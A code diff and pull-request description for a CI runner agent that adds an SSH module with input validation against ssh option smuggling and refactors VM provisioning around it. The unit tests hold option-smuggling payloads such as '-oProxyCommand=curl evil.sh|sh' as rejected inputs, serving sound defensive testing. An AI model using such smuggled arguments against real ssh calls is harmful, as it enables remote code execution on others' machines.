+/// quotes, whitespace, and the path separator. IPv4/IPv6/hostnames all fit
+/// inside `[A-Za-z0-9._:-]`; usernames inside `[A-Za-z0-9._-]`. Cap length at
+/// 253 (DNS label limit) to bound any worst-case argv ballooning.
+fn is_safe_ssh_identifier(s: &str) -> bool {
+    if s.is_empty() || s.len() > 253 {
+        return false;
+    }
+    if s.starts_with('-') {
+        return false;
+    }
+    s.bytes()
+        .all(|b| b.is_ascii_alphanumeric() || b == b'.' || b == b'_' || b == b'-' || b == b':')
+}
+
+#[derive(Debug, thiserror::Error)]
+pub enum SshError {
+    #[error("invalid ssh user '{0}' — must match [A-Za-z0-9._-]{{1,253}} and not start with '-'")]
+    InvalidUser(String),
+    #[error("invalid ssh host '{0}' — must match [A-Za-z0-9.:_-]{{1,253}} and not start with '-'")]
+    InvalidHost(String),
+}
+
+impl SshTarget {
+    /// Validate then construct. Rejects host/user values that could be
+    /// mistaken for ssh options (the option-smuggling RCE). All callers MUST
+    /// use this — `host`/`user` are private to prevent struct-literal bypass.
+    pub fn new(host: String, user: String, auth: SshAuth) -> Result<Self, SshError> {
+        if !is_safe_ssh_identifier(&user) {
+            return Err(SshError::InvalidUser(user));
+        }
+        if !is_safe_ssh_identifier(&host) {
+            return Err(SshError::InvalidHost(host));
+        }
+        Ok(Self { host, user, auth })
+    }
+
+    fn ssh_options() -> Vec<&'static str> {
+        vec![
+            "-o",
+            "StrictHostKeyChecking=no",
+            "-o",
+            "UserKnownHostsFile=/dev/null",
+            "-o",
+            "ConnectTimeout=10",
+        ]
+    }
+
+    /// Extra ssh options for the password-auth flow. Without
+    /// `PreferredAuthentications=password` + `PubkeyAuthentication=no`,
+    /// ssh tries every key in `~/.ssh/` first, then falls back to
+    /// keyboard-interactive — and `sshpass -f` only intercepts the
+    /// `password` prompt, not keyboard-interactive. The result on macOS
+    /// hosts is a silent ssh exit (just "Permanently added <ip>" stderr,
+    /// no auth error), which the agent surfaces as "SSH exec failed".
+    /// Forcing the auth method straight to `password` lets sshpass do its
+    /// job and gives a real error if it still fails.
+    fn ssh_password_options() -> Vec<&'static str> {
+        vec![
+            "-o",
+            "PreferredAuthentications=password",
+            "-o",
+            "PubkeyAuthentication=no",
+        ]
+    }
+
+    fn destination(&self) -> String {
+        format!("{}@{}", self.user, self.host)
+    }
+
+    /// Build an `ssh user@host <remote_cmd>` Command, configured for the auth mode.
+    /// The literal `--` argv separator before the destination guarantees ssh
+    /// stops parsing options before our user-controlled value (defence in
+    /// depth — `SshTarget::new` already validates these).
+    fn ssh_cmd(&self, remote_cmd: &str) -> Command {
+        match &self.auth {
+            SshAuth::Key(key_path) => {
+                let mut c = Command::new("ssh");
+                c.arg("-i")
+                    .arg(key_path)
+                    .args(Self::ssh_options())
+                    .arg("--")
+                    .arg(self.destination())
+                    .arg(remote_cmd)
+                    .stdout(Stdio::piped())
+                    .stderr(Stdio::piped());
+                c
+            }
+            SshAuth::PasswordFile(pw_path) => {
+                let mut c = Command::new("sshpass");
+                c.arg("-f")
+                    .arg(pw_path)
+                    .arg("ssh")
+                    .args(Self::ssh_options())
+                    .args(Self::ssh_password_options())
+                    .arg("--")
+                    .arg(self.destination())
+                    .arg(remote_cmd)
+                    .stdout(Stdio::piped())
+                    .stderr(Stdio::piped());
+                c
+            }
+        }
+    }
+
+    /// Build an `scp <local> user@host:<remote>` Command. `--` separator same
+    /// reason as `ssh_cmd`.
+    fn scp_cmd(&self, local: &Path, remote: &str) -> Command {
+        let remote_arg = format!("{}:{}", self.destination(), remote);
+        match &self.auth {
+            SshAuth::Key(key_path) => {
+                let mut c = Command::new("scp");
+                c.arg("-i")
+                    .arg(key_path)
+                    .args(Self::ssh_options())
+                    .arg("--")
+                    .arg(local)
+                    .arg(remote_arg)
+                    .stdout(Stdio::piped())
+                    .stderr(Stdio::piped());
+                c
+            }
+            SshAuth::PasswordFile(pw_path) => {
+                let mut c = Command::new("sshpass");
+                c.arg("-f")
+                    .arg(pw_path)
+                    .arg("scp")
+                    .args(Self::ssh_options())
+                    .args(Self::ssh_password_options())
+                    .arg("--")
+                    .arg(local)
+                    .arg(remote_arg)
+                    .stdout(Stdio::piped())
+                    .stderr(Stdio::piped());
+                c
+            }
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn safe_identifier_accepts_normal_usernames_and_hosts() {
+        for s in [
+            "runner",
+            "ubuntu",
+            "cirun-runner",
+            "10.0.0.1",
+            "host.example.com",
+            "::1",
+        ] {
+            assert!(is_safe_ssh_identifier(s), "rejected legitimate value: {s}");
+        }
+    }
+
+    #[test]
+    fn safe_identifier_rejects_option_smuggling() {
+        for s in ["-oProxyCommand=curl evil.sh|sh", "-i/tmp/evil", "-", "--"] {
+            assert!(!is_safe_ssh_identifier(s), "leading-dash accepted: {s}");
+        }
+    }
+
+    #[test]
+    fn safe_identifier_rejects_shell_metachars_and_whitespace() {
+        for s in ["a b", "a;b", "a|b", "a$b", "a`b`", "a\nb", "a/b", "a\"b"] {
+            assert!(!is_safe_ssh_identifier(s), "metachar accepted: {s:?}");
+        }
+    }
+
+    #[test]
+    fn safe_identifier_rejects_empty_and_overlong() {
+        assert!(!is_safe_ssh_identifier(""));
+        assert!(!is_safe_ssh_identifier(&"a".repeat(254)));
+    }
+
+    #[test]
+    fn ssh_target_new_rejects_option_smuggling_user() {
+        let r = SshTarget::new(
+            "10.0.0.1".into(),
+            "-oProxyCommand=curl evil|sh".into(),
+            SshAuth::Key(PathBuf::from("/tmp/k")),
+        );
+        assert!(matches!(r, Err(SshError::InvalidUser(_))));
+    }
+
+    #[test]
+    fn ssh_target_new_rejects_option_smuggling_host() {
+        let r = SshTarget::new(
+            "-oProxyCommand=evil".into(),
+            "runner".into(),
+            SshAuth::Key(PathBuf::from("/tmp/k")),
+        );
+        assert!(matches!(r, Err(SshError::InvalidHost(_))));
+    }
+
+    #[test]
+    fn ssh_target_new_accepts_valid() {
+        let r = SshTarget::new(
+            "10.0.0.1".into(),
+            "runner".into(),
+            SshAuth::Key(PathBuf::from("/tmp/k")),
+        );
+        assert!(r.is_ok());
+    }
+}
+
+/// Run a remote command via SSH with a hard timeout. Captures stdout/stderr.
+pub async fn exec(target: &SshTarget, remote_cmd: &str, timeout: Duration) -> Result<String> {
+    let output = tokio::time::timeout(timeout, target.ssh_cmd(remote_cmd).output())
+        .await
+        .map_err(|_| anyhow!("SSH exec timed out after {:?}", timeout))?
+        .map_err(|e| anyhow!("SSH spawn error: {}", e))?;
+    if !output.status.success() {
+        return Err(anyhow!(
+            "SSH exec failed: {}",
+            String::from_utf8_lossy(&output.stderr)
+        ));
+    }
+    Ok(String::from_utf8_lossy(&output.stdout).to_string())
+}
+
+/// Cheap connectivity probe: runs `echo` over SSH. Returns Ok if the connection works.
+pub async fn test_connection(target: &SshTarget) -> Result<()> {
+    exec(target, "echo SSH-OK", Duration::from_secs(30)).await?;
+    Ok(())
+}
+
+/// Copy a local file to the remote via SCP.
+pub async fn copy_file(target: &SshTarget, local: &Path, remote: &str) -> Result<()> {
+    let output = tokio::time::timeout(
+        Duration::from_secs(60),
+        target.scp_cmd(local, remote).output(),
+    )
+    .await
+    .map_err(|_| anyhow!("SCP transfer timed out after 60s"))?
+    .map_err(|e| anyhow!("SCP spawn error: {}", e))?;
+    if !output.status.success() {
+        return Err(anyhow!(
+            "SCP failed: {}",
+            String::from_utf8_lossy(&output.stderr)
+        ));
+    }
+    info!(
+        "✔ SCP transferred {:?} -> {}:{}",
+        local,
+        target.destination(),
+        remote
+    );
+    Ok(())
+}

--- a/src/vm_provision.rs
+++ b/src/vm_provision.rs
@@ -1,15 +1,11 @@
 use crate::lume::{LumeClient, RunConfig};
-use log::{error, info, warn};
-use std::fs::{remove_file, File};
-use std::io::Write;
-use std::process::Stdio;
-use std::time::{Duration, Instant};
-use tempfile::NamedTempFile;
-use tokio::process::Command;
-use tokio::time::sleep;
-
 use anyhow::Result;
 use backon::{ExponentialBuilder, Retryable};
+use log::{error, info, warn};
+use std::io::Write;
+use std::time::{Duration, Instant};
+use tempfile::NamedTempFile;
+use tokio::time::sleep;
 
 pub async fn run_script_on_vm(
     lume: &LumeClient,
@@ -58,220 +54,94 @@ pub async fn run_script_on_vm(
     let ip_address = wait_for_vm_ip(lume, vm_name, timeout_seconds).await?;
     info!("VM is running with IP: {}", ip_address);
 
-    // Step 4: Create a temporary file for the script
+    use crate::ssh::{copy_file, exec, test_connection, SshAuth, SshTarget};
+
     info!("Creating temporary script file");
     let mut temp_file = NamedTempFile::new()?;
     temp_file.write_all(script_content.as_bytes())?;
-    let temp_file_path = temp_file
-        .path()
-        .to_str()
-        .ok_or("Failed to get temporary file path")?;
 
-    // Step 5: Create a temporary password file for sshpass
-    let password_file_path = create_password_file(password)?;
-    info!("Created temporary password file for SSH authentication");
+    // password_tmp must outlive the target (dropped on function exit auto-deletes).
+    let password_tmp = create_password_file(password)?;
+    info!(
+        "SSH target: {}@{} (password auth, password length={})",
+        username,
+        ip_address,
+        password.len()
+    );
+    let target = SshTarget::new(
+        ip_address.clone(),
+        username.to_string(),
+        SshAuth::PasswordFile(password_tmp.path().to_path_buf()),
+    )?;
 
-    // Step 6: Setup SSH options
-    let ssh_options = vec![
-        "-o",
-        "StrictHostKeyChecking=no",
-        "-o",
-        "UserKnownHostsFile=/dev/null",
-        "-o",
-        "ConnectTimeout=10",
-    ];
-
-    // Step 7: Test SSH connection with retries (capped at 10 retries, 30s timeout per attempt)
-    info!("Testing SSH connection to VM");
-    let ssh_test_result = || async {
-        let output = tokio::time::timeout(
-            tokio::time::Duration::from_secs(30),
-            Command::new("sshpass")
-                .arg("-f")
-                .arg(&password_file_path)
-                .arg("ssh")
-                .args(&ssh_options)
-                .arg(format!("{}@{}", username, ip_address))
-                .arg("echo 'SSH connection test successful'")
-                .stdout(Stdio::piped())
-                .stderr(Stdio::piped())
-                .output(),
-        )
-        .await
-        .map_err(|_| anyhow::anyhow!("SSH connection timed out after 30s"))?
-        .map_err(|e| anyhow::anyhow!("SSH command error: {}", e))?;
-
-        if !output.status.success() {
-            Err(anyhow::anyhow!(
-                "SSH connection failed: {}",
-                String::from_utf8_lossy(&output.stderr)
-            ))
-        } else {
-            Ok(())
-        }
-    };
-
-    ssh_test_result
+    // Test SSH (VM may still be booting). Use backon for exponential retry.
+    (|| async { test_connection(&target).await })
         .retry(ExponentialBuilder::default().with_max_times(10))
         .sleep(tokio::time::sleep)
-        .when(|e| {
-            let msg = e.to_string();
-            msg.contains("SSH connection failed") || msg.contains("SSH connection timed out")
-        })
         .notify(|err, dur| warn!("Retrying SSH connection after {:?}: {:?}", dur, err))
         .await?;
-
     info!("✔ SSH connection successful");
 
-    // Step 8: Copy the script to the VM using sshpass with retries
+    // Copy script to VM (with retry).
     let remote_script_path = format!("/tmp/script_{}.sh", Instant::now().elapsed().as_secs());
-    info!("Copying script to VM at {}", remote_script_path);
+    let temp_path = temp_file.path().to_path_buf();
+    (|| {
+        let target = &target;
+        let temp_path = temp_path.clone();
+        let remote_script_path = remote_script_path.clone();
+        async move { copy_file(target, &temp_path, &remote_script_path).await }
+    })
+    .retry(ExponentialBuilder::default().with_max_times(5))
+    .sleep(tokio::time::sleep)
+    .notify(|err, dur| warn!("Retrying SCP transfer after {:?}: {:?}", dur, err))
+    .await?;
 
-    let scp_transfer = || async {
-        let output = tokio::time::timeout(
-            tokio::time::Duration::from_secs(60),
-            Command::new("sshpass")
-                .arg("-f")
-                .arg(&password_file_path)
-                .arg("scp")
-                .args(&ssh_options)
-                .arg(temp_file_path)
-                .arg(format!(
-                    "{}@{}:{}",
-                    username, ip_address, remote_script_path
-                ))
-                .stdout(Stdio::piped())
-                .stderr(Stdio::piped())
-                .output(),
+    // Execute. Detached: short launch timeout. Blocking: 10min.
+    let (timeout_secs, cmd) = if run_detached {
+        (
+            60u64,
+            format!(
+                "chmod +x {p} && nohup {p} > /tmp/script_stdout.log 2> /tmp/script_stderr.log & echo $!",
+                p = remote_script_path
+            ),
         )
-        .await
-        .map_err(|_| anyhow::anyhow!("SCP transfer timed out after 60s"))?
-        .map_err(|e| anyhow::anyhow!("SCP command error: {}", e))?;
-
-        if !output.status.success() {
-            Err(anyhow::anyhow!(
-                "SCP failed: {}",
-                String::from_utf8_lossy(&output.stderr)
-            ))
-        } else {
-            Ok(())
-        }
+    } else {
+        (
+            600u64,
+            format!("chmod +x {p} && {p}", p = remote_script_path),
+        )
     };
+    let script_output = (|| {
+        let target = &target;
+        let cmd = cmd.clone();
+        async move { exec(target, &cmd, tokio::time::Duration::from_secs(timeout_secs)).await }
+    })
+    .retry(ExponentialBuilder::default().with_max_times(3))
+    .sleep(tokio::time::sleep)
+    .notify(|err, dur| warn!("Retrying script execution after {:?}: {:?}", dur, err))
+    .await?;
 
-    scp_transfer
-        .retry(ExponentialBuilder::default().with_max_times(5))
-        .sleep(tokio::time::sleep)
-        .when(|e| {
-            let msg = e.to_string();
-            msg.contains("SCP failed") || msg.contains("SCP transfer timed out")
-        })
-        .notify(|err, dur| warn!("Retrying SCP transfer after {:?}: {:?}", dur, err))
-        .await?;
+    // password_tmp drops here, auto-removing the file. No manual cleanup needed.
+    drop(password_tmp);
 
-    info!("✔ SCP transfer successful");
-
-    // Step 9: Execute the script on the VM with retries (capped at 3 retries, with timeout)
-    let execute_script = || async {
-        let (timeout_secs, cmd_future) = if run_detached {
-            info!("Executing script on VM in detached mode");
-            (
-                60u64,
-                Command::new("sshpass")
-                    .arg("-f").arg(&password_file_path)
-                    .arg("ssh")
-                    .args(&ssh_options)
-                    .arg(format!("{}@{}", username, ip_address))
-                    .arg(format!("chmod +x {} && nohup {} > /tmp/script_stdout.log 2> /tmp/script_stderr.log & echo $!",
-                                 remote_script_path, remote_script_path))
-                    .stdout(Stdio::piped())
-                    .stderr(Stdio::piped())
-                    .output(),
-            )
-        } else {
-            info!("Executing script on VM and waiting for completion");
-            (
-                600u64,
-                Command::new("sshpass")
-                    .arg("-f")
-                    .arg(&password_file_path)
-                    .arg("ssh")
-                    .args(&ssh_options)
-                    .arg(format!("{}@{}", username, ip_address))
-                    .arg(format!(
-                        "chmod +x {} && {}",
-                        remote_script_path, remote_script_path
-                    ))
-                    .stdout(Stdio::piped())
-                    .stderr(Stdio::piped())
-                    .output(),
-            )
-        };
-
-        let output =
-            tokio::time::timeout(tokio::time::Duration::from_secs(timeout_secs), cmd_future)
-                .await
-                .map_err(|_| anyhow::anyhow!("Script execution timed out after {}s", timeout_secs))?
-                .map_err(|e| anyhow::anyhow!("Script command error: {}", e))?;
-
-        if !output.status.success() {
-            Err(anyhow::anyhow!(
-                "Script execution failed: {}",
-                String::from_utf8_lossy(&output.stderr)
-            ))
-        } else {
-            Ok(String::from_utf8_lossy(&output.stdout).to_string())
-        }
-    };
-
-    let script_output = execute_script
-        .retry(ExponentialBuilder::default().with_max_times(3))
-        .sleep(tokio::time::sleep)
-        .when(|e| {
-            let msg = e.to_string();
-            msg.contains("Script execution failed") || msg.contains("Script execution timed out")
-        })
-        .notify(|err, dur| warn!("Retrying script execution after {:?}: {:?}", dur, err))
-        .await?;
-
-    // Step 10: Clean up password file
-    clean_up_password_file(&password_file_path);
-
-    // Step 11: Return the output
     info!("Script execution completed successfully.");
     Ok(script_output)
 }
 
-// Helper function to create a temporary file containing the password
-fn create_password_file(password: &str) -> Result<String, Box<dyn std::error::Error>> {
-    let temp_dir = std::env::temp_dir();
-    let password_file_path = temp_dir.join(format!(
-        "sshpass_{}.txt",
-        Instant::now().elapsed().as_millis()
-    ));
-
-    let mut file = File::create(&password_file_path)?;
-    file.write_all(password.as_bytes())?;
-
-    // Restrict permissions on the password file (important for security)
+/// Write the SSH password to a 0600 tempfile using `NamedTempFile` (O_EXCL +
+/// random suffix → not symlink-attackable, unlike the previous predictable
+/// `/tmp/sshpass_<millis>.txt`). Returns the `NamedTempFile` — keep it alive
+/// for the full SSH session; drop it to auto-delete. Permissions are tightened
+/// BEFORE the password is written to the file.
+fn create_password_file(password: &str) -> Result<NamedTempFile, Box<dyn std::error::Error>> {
+    let mut tmp = NamedTempFile::new()?;
     #[cfg(unix)]
     {
         use std::os::unix::fs::PermissionsExt;
-        let metadata = file.metadata()?;
-        let mut permissions = metadata.permissions();
-        permissions.set_mode(0o600); // Owner read/write only
-        std::fs::set_permissions(&password_file_path, permissions)?;
+        std::fs::set_permissions(tmp.path(), std::fs::Permissions::from_mode(0o600))?;
     }
-
-    Ok(password_file_path.to_string_lossy().to_string())
-}
-
-// Helper function to clean up the password file
-fn clean_up_password_file(file_path: &str) {
-    if let Err(e) = remove_file(file_path) {
-        error!("Failed to remove temporary password file: {}", e);
-    } else {
-        info!("Temporary password file removed");
-    }
+    tmp.write_all(password.as_bytes())?;
+    Ok(tmp)
 }
 
 async fn wait_for_vm_ip(


### PR DESCRIPTION
Replaces three near-identical do_provision_* free functions (~340 lines
of duplicated inspect/spawn/settle/classify state machine) with a single
Executor trait whose default provision() owns the state machine. Each
executor implements 4 primitives (inspect, spawn, kill, list_owned) plus
override hooks (validate, prepare, run_post_spawn, settle_timeout).

Per-runner dispatch is now payload-driven: extra_config.executor selects
the executor and extra_config.gpu is parsed into GpuRequest (None/All/Count).
The CIRUN_EXECUTOR env var and use_docker()/use_meda() helpers are deleted;
selection comes from the API payload and falls back to OS default.

GPU count-pinning is wired end-to-end: parse_gpu_request reads the payload,
DockerExecutor::spawn maps Count(n) to GpuSelection::Count(n), and
build_run_argv emits --gpus N.

Settle-window bug fixed in one place: the default provision() returns
Transient after settle_timeout (default 120s, was a 45s hardcode that
falsely declared Ok). run_post_spawn is called when settle reaches
Healthy, ensuring meda/lume push their SSH provision script.

main.rs shrunk 2196 -> 626 lines by splitting into focused modules:
- src/executor/{mod,docker,meda,lume,registry}.rs
- src/cirun_client.rs (HTTP + orchestration)
- src/api.rs (wire types)
- src/service.rs (systemd/launchd install)
- src/ssh.rs (shared SshAuth + scp/exec helpers)

All files now under 1000 lines. Build clean, 45 unit tests pass.